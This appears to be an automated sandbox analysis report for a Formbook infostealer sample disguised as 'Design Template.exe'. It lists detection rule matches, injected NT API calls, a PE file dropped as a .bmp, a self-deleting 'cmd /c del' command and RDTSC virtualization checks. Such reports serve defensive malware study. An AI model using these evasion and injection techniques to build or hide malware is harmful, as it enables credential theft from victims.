        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434168 NtCreateFile,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043816D NtTerminateProcess,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A3B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043A5B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434678 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004356B8 NtWriteFile,NtCreateSection,NtClose,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00433FF8 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434798 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0043501A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434D27 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A499A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A495D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A498A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4B040 NtSuspendThread,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A499D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49A10 NtQuerySection,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A495F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4AD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49560 NtWriteFile,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A496D0 NtCreateKey,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49760 NtOpenProcess,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A4A770 NtOpenThread,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A49770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C95D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9650 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C96D0 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9560 NtWriteFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9520 NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CAD30 NtSetContextThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C95F0 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9670 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9610 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9760 NtOpenProcess,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA770 NtOpenThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA710 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9730 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C97A0 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CB040 NtSuspendThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9820 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C98F0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C98A0 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9950 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C99D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A00 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A10 NtQuerySection,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A20 NtResumeThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9A80 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C9B00 NtSetValueKey,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044CA3B0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005081B0 NtCreateFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00508260 NtReadFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005082E0 NtClose,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00508390 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005081AA NtCreateFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050825B NtReadFile,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005082DA NtClose,
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050838A NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00434798
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042C063
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042572C
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00429FD0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A320A0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD20A8
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1B090
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD28EC
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AC1002
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A24120
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A0F900
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD22AE
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A3EBB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACDBD2
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2B28
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1841F
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACD466
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A32581
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A1D5E0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD25DD
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A00D20
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2D07
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1D55
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD2EF7
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A26E30
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00ACD616
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00AD1FF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454D466
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449841F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551D55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552D07
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04480D20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045525DD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454D616
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A6E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552EF7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551FF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04541002
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045528EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B090
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045520A8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448F900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045522AE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04552B28
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0454DBD2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BEBB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050C838
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F8C4B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F8C50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F2D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F2FB0
        Source: C:\Users\user\Desktop\Design Template.exeCode function: String function: 00422DE8 appears 49 times
        Source: C:\Users\user\Desktop\Design Template.exeCode function: String function: 00A0B150 appears 35 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0448B150 appears 35 times
        Source: Liebert.bmp.2.drStatic PE information: No import functions for PE file found
        Source: Design Template.exe, 00000004.00000002.329749944.0000000002629000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Design Template.exe
        Source: Design Template.exe, 00000004.00000002.329471350.0000000000C8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Design Template.exe
        Source: Design Template.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Liebert.bmp.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: Liebert.bmp.2.drStatic PE information: Section .text
        Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/1@15/6
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042D194 FindResourceA,LoadResource,LockResource,
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user~1\AppData\Local\Temp\Liebert.bmpJump to behavior
        Source: Design Template.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Design Template.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: Design Template.exeVirustotal: Detection: 34%
        Source: unknownProcess created: C:\Users\user\Desktop\Design Template.exe 'C:\Users\user\Desktop\Design Template.exe'
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Design Template.exeProcess created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
        Source: Design Template.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: Design Template.exeStatic PE information: section name: .cdata
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00422C20 push eax; ret
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00422DE8 push eax; ret
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A5D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044DD0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_004F4984 push ebx; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3F2 push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3FB push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B3A5 push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050B45C push eax; ret
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0050BCBE push ss; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.31104749099
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_004218A0 IsIconic,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00421A45 IsIconic,GetWindowPlacement,GetWindowRect,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00427F30 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_00427780 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,
        Source: C:\Users\user\Desktop\Design Template.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\Design Template.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Design Template.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000004F85E4 second address: 00000000004F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000004F896E second address: 00000000004F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 4_2_00A36A60 rdtscp
        Source: C:\Users\user\Desktop\Design Template.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Source: C:\Windows\explorer.exe TID: 5548Thread sleep time: -45000s >= -30000s
